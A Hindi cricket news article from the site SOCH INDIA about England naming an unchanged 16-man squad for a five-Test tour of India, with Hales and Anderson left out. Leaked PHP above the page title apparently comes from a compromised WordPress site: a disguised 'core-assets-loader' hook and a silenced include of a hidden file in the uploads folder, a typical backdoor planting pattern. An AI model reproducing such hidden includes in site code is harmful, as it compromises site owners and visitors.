add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); भारत दौरे के लिए इंग्लैंड ने किया टीम ऐलान – SOCH INDIA
Menu

खेल
भारत दौरे के लिए इंग्लैंड ने किया टीम ऐलान

nobanner

भारत के खिलाफ पांच टेस्ट मैचों की सीरीज के लिए 16 सदस्यीय इंग्लैंड टीम की घोषणा कर दी गई है. इस समय बांग्लादेश में टेस्ट सीरीज खेल रही टीम ही भारत दौरे पर आएगी. टीम में कोई बदलाव नहीं किया गया है. इंग्लैंड क्रिकेट बोर्ड (ईसीबी) ने अपनी वेबसाइट के माध्यम से इस बात की जानकारी दी है.

बीबीसी के मुताबिक, सलामी बल्लेबाज एलेक्स हेल्स को टीम में नहीं चुना गया है. वह सुरक्षा कारणों से बांग्लादेश के दौरे पर नहीं गए थे.

तेज गेंदबाज जेम्स एंडरसन भी चोट के कारण टीम में जगह नहीं बना पाए हैं. कप्तान एलिस्टर कुक पहले ही कह चुके थे कि एंडरसन भारत के खिलाफ टेस्ट मैच नहीं खेल पाएंगे. वह इस समय कंधे की चोट से जूझ रहे हैं. उनके दिसंबर तक ठीक होने की उम्मीद है.

इंग्लैंड ने बांग्लादेश के खिलाफ पहले टेस्ट मैच में 22 रनों से जीत दर्ज की थी.